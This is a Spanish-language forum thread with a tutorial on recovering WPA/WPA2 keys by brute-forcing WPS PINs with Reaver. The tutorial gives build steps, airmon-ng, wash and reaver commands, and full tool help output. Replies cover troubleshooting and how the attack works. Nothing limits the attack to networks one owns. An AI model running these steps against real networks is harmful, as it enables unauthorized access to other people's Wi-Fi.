Crackeando WPA/WPA2 con Reaver

Iniciado por ANTRAX, Agosto 26, 2014, 02:56:07 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Agosto 26, 2014, 02:56:07 PM Ultima modificación: Abril 10, 2015, 09:48:16 PM por Cl0udswX

Descargamos Reaver desde acá: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

O desde la consola:

Código: bash
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz


Luego lo descomprimimos:

Código: bash
tar -xvf reaver-1.4.tar.gz


Entramos en la carpeta cd reaver-1.4/src

Despues lo instalamos con

Código: bash
./configure
make
make install


Y listo ya lo tenemos instalado
Ahora a comprobar las redes vulnerables
* Ponemos nuestra targeta en modo monitor

Código: bash
airmon-ng start wlan0



*Para buscar las redes vulnerables escribimos

Código: bash
wash -i mon0



sintaxis de wash:

Código: text
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

Required Arguments:
    -i, --interface=<iface>              Interface to capture packets on
    -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
    -c, --channel=<num>                  Channel to listen on [auto]
    -o, --out-file=<file>                Write data to file
    -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
    -D, --daemonize                      Daemonize wash
    -C, --ignore-fcs                     Ignore frame checksum errors
    -5, --5ghz                           Use 5GHz 802.11 channels
    -s, --scan                           Use scan mode
    -u, --survey                         Use survey mode [default]
    -h, --help                           Show help

Example:
    wash -i mon0


*Anotamos los datos del wifi como el Access Point(B4:5D:3F:XX:XX:XX y canal. Luego ejecutamos reaver

Ejemplo: Uso:

Código: bash
reaver -i mon0 -b 00:1D:CE:6F:XX:XX -vv


Sintaxis de Reaver

Código: text
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

Required Arguments:
    -i, --interface=<wlan>          Name of the monitor-mode interface to use
    -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
    -m, --mac=<mac>                 MAC of the host system
    -e, --essid=<ssid>              ESSID of the target AP
    -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
    -o, --out-file=<file>           Send output to a log file [stdout]
    -s, --session=<file>            Restore a previous session file
    -C, --exec=<command>            Execute the supplied command upon successful pin recovery
    -D, --daemonize                 Daemonize reaver
    -a, --auto                      Auto detect the best advanced options for the target AP
    -f, --fixed                     Disable channel hopping
    -5, --5ghz                      Use 5GHz 802.11 channels
    -v, --verbose                   Display non-critical warnings (-vv for more)
    -q, --quiet                     Only display critical messages
    -h, --help                      Show help

Advanced Options:
    -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
    -d, --delay=<seconds>           Set the delay between pin attempts [1]
    -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
    -g, --max-attempts=<num>        Quit after num pin attempts
    -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
    -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    -t, --timeout=<seconds>         Set the receive timeout period [5]
    -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
    -A, --no-associate              Do not associate with the AP (association must be done by another application)
    -N, --no-nacks                  Do not send NACK messages when out of order packets are received
    -S, --dh-small                  Use small DH keys to improve crack speed
    -L, --ignore-locks              Ignore locked state reported by the target AP
    -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
    -n, --nack                      Target AP always sends a NACK [Auto]
    -w, --win7                      Mimic a Windows 7 registrar [False]

Example:
    reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv


En mi caso me he tardado desde tres horas en sacar la clave wpa hasta 98 horas

Aqui les dejo algunos screenshoots :



Autor: briansx_404


Exelente, clarito, buen aporte, Gracias ANTRAX

Me va a venir bien este tutorial para la nueva antena..

Gracias Antrax,

Un saludo.



Cuando ejecuto el Reaver solo me analiza con un mismo pin, y no va variando ni probando con otros. Cual puede ser el problema? Un saludo

Podrías compartir tu forma de usarlo?

Saludos por allá hermano.
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


La forma de usarlo es la misma que en este tutorial. El fallo viene en el ultimo paso, que solo lo prueba para un mismo pin. Uso el s.o kali linux.

Lo primero es que cuando pregunto tu forma de usarlo esperaba una respuesta concreta, el hecho que escribas:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
La forma de usarlo es la misma que en este tutorial.

No dice mucho, para ayudarte debes proporcionar suficiente información al respecto, tales como:

La forma en que lo instalaste
El tipo de tarjeta que tienes
La versión de Kali que tienes
La versión de reaver que estas usando.

Si me dices que lo haces igual que en el tutorial debería funcionarte igual que en el tutorial, por lo cual obviamente algo no esta del todo igual.

Saludos por allá hermano.
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


Muy pero muy buenas. Tengo un par de preguntas de quien recién comienza con el tema del crackeo en redes wireless y se encuentra con éste programa Reaver... y varias dificultades con los putos WPA/WPA2:

En términos básicos, ¿de qué forma ataca éste programa?

Tengo entendido que uno de los métodos más usados para el crackeo en redes WPA/WPA2 es el uso de diccionarios y la suerte. Método un poco jodido para quienes no disponemos de 1mb de velocidad de bajada y nos damos con diccionarios de 10gb que no sólo representan vaaarias horas de bajada sino que son un tiro al blanco con los ojos vendados, con una pistola de agua, agua sucia, a una diana a 10Km. No da...

Entonces... ¿Éste programa intenta atacar probando pines WPS? ¿También usa diccionarios?

Muchas gracias por la info y, si mis preguntas están mal formuladas, por favor comentarlo. De nuevo, muchas gracias...
Si nos imponemos limites, no seremos más.

Si, reaver lo que hace es probar pins WPS y si en vez de usar reaver a secas usas algun script como gemini auditor este te automatiza todo el proceso buscando patrones conocidos y probando pins genéricos. En caso de no funcionar los pins genericos hace uso de la fuerza bruta para probar todos los posibles pins. Pero reaver no hace uso de diccionarios, o eso tengo entendido yo. No se si podras pasarle un diccionario de pins o algo asi.


Piensa por ti mismo y cuestiona a la autoridad.